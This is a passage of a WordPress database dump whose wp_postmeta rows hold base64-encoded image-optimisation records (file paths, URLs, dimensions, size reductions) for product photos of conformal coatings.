wvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3MGMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE0NjUsImlkIjoxNDA1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcwYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MGMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzBjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxNjMsInRpbWUiOjE0ODM1NzE0NjcsImlkIjoxNDA1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcwYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MGMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzBjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMzMsInRpbWUiOjE0ODM1NzE0NzAsImlkIjoxNDA1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcwYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MGMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzBjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxMjQsInRpbWUiOjE0ODM1NzE0NzIsImlkIjoxNDA1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcwYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MGMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzBjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNDc1LCJpZCI6MTQwNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MGMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzBjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDcwYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTQ3OCwiaWQiOjE0MDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzBjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcwYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3MGMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE0ODAsImlkIjoxNDA1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29535, 1404, 'wpfc_optimisation_reduction', '2347881'); 
INSERT INTO `wp_postmeta` VALUES (29536, 1404, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmcuanBnIiwicmVkdWN0aW9uIjoyMzQ3NzgyLCJ0aW1lIjoxNDgzNTcxNDkyLCJpZCI6IjE0MDQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTQ5NSwiaWQiOjE0MDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNDk4LCJpZCI6MTQwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE1MDMsImlkIjoxNDA0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNTA3LCJpZCI6MTQwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE1MTAsImlkIjoxNDA0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTUxMiwiaWQiOjE0MDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNTE1LCJpZCI6MTQwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE1MTgsImlkIjoxNDA0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo4MiwidGltZSI6MTQ4MzU3MTUyMCwiaWQiOjE0MDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjUsInRpbWUiOjE0ODM1NzE1MjMsImlkIjoxNDA0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNTI1LCJpZCI6MTQwNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTUyOCwiaWQiOjE0MDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE1MzEsImlkIjoxNDA0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDY3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNTMzLCJpZCI6MTQwNH1d'); 
INSERT INTO `wp_postmeta` VALUES (29537, 1403, 'wpfc_optimisation_reduction', '2163989'); 
INSERT INTO `wp_postmeta` VALUES (29538, 1403, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmcuanBnIiwicmVkdWN0aW9uIjoyMTYzNTUxLCJ0aW1lIjoxNDgzNTcxNTQ0LCJpZCI6IjE0MDMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTU0NywiaWQiOjE0MDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFj